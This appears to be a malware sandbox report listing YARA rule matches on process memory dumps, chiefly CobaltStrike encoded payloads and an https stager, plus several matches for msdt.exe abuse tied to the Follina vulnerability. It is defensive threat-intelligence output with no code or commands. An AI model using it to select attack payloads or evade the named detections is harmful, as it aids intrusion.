Source: 00000019.00000003.500310887.0000000006DF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.505719347.0000000006392000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500548113.0000000006DC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000009.00000002.585006641.0000000003700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
Source: 00000019.00000003.500261822.0000000006E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500418706.0000000006DDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000002.568673308.0000000006E23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.507852725.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000002.568682358.0000000006E26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.508838061.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499473983.0000000006E97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 0000001E.00000002.556428060.0000000002CE0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_RAW_Payload_https_stager_x86 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500155514.0000000006E1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499623622.0000000006E7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.508459967.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000002.568748602.0000000006E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000002.568710134.0000000006E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.507100056.00000000060F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499889442.0000000006E4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.506175810.00000000062EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.508628056.0000000005D0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499641627.0000000006E7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499824941.0000000006E5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.506705393.000000000618E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.501596100.0000000006A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.501243619.0000000006B54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500112961.0000000006E27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499962160.0000000006E3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500328316.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000002.568738886.0000000006E3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.509561363.0000000005B0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.507377946.0000000006041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000002.568792297.0000000006E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000009.00000002.582026384.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
Source: 00000019.00000003.499598965.0000000006E84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.504952600.000000000646C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500604850.0000000006CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499944069.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.504750760.00000000064EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.502123395.00000000068FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499912534.0000000006E47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500175997.0000000006E14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.506567409.0000000006230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499654163.0000000006E77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500392333.0000000006DE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500656702.0000000006C3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500133947.0000000006E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.507760692.0000000005EF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499706418.0000000006E6E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.504345055.000000000656C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499750187.0000000006E67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499521324.0000000006E8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.508543817.0000000005DB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.501697332.0000000006A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.501200856.0000000006C04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.509127714.0000000005BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500032754.0000000006E31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000002.567918240.0000000006071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.502899282.0000000006741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.503663386.0000000006640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500236769.0000000006E0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.507414149.0000000006071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.509264079.0000000005B78000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.507996577.0000000005E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499506056.0000000006E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.508112663.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499764114.0000000006E64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500280490.0000000006DFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.507642082.0000000005F41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000002.567865973.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500590066.0000000006DBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.503439579.00000000066C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.502667836.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.502479061.0000000006841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.507423559.0000000005FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.502365955.00000000067F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499804770.0000000006E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.508327386.0000000005DBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.508977198.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.508083711.0000000005EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.507943546.0000000005E86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500124456.0000000006E24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499664750.0000000006E74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.507900626.0000000005F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.502171014.0000000006880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.501943577.0000000006902000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499900664.0000000006E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.501775845.00000000069FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.507263765.000000000606A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.505360761.00000000063EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000009.00000002.556829484.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
Source: 00000019.00000003.506426333.000000000626E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500371775.0000000006DEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.509507876.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000002.568633989.0000000006E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500271247.0000000006E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.509762082.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000002.568691207.0000000006E29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.507305461.0000000005FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500574937.0000000006DC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500300611.0000000006DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500381322.0000000006DE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499851554.0000000006E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000002.568719259.0000000006E33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.504543226.0000000006527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000002.569049205.0000000006E9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499716165.0000000006E6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.506765353.0000000006170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.506625375.00000000061EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.509636935.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.508201854.0000000005DC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.501854915.0000000006980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499572225.0000000006E8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500537921.0000000006DCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500290954.0000000006DFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.509363516.0000000005B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499838198.0000000006E5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
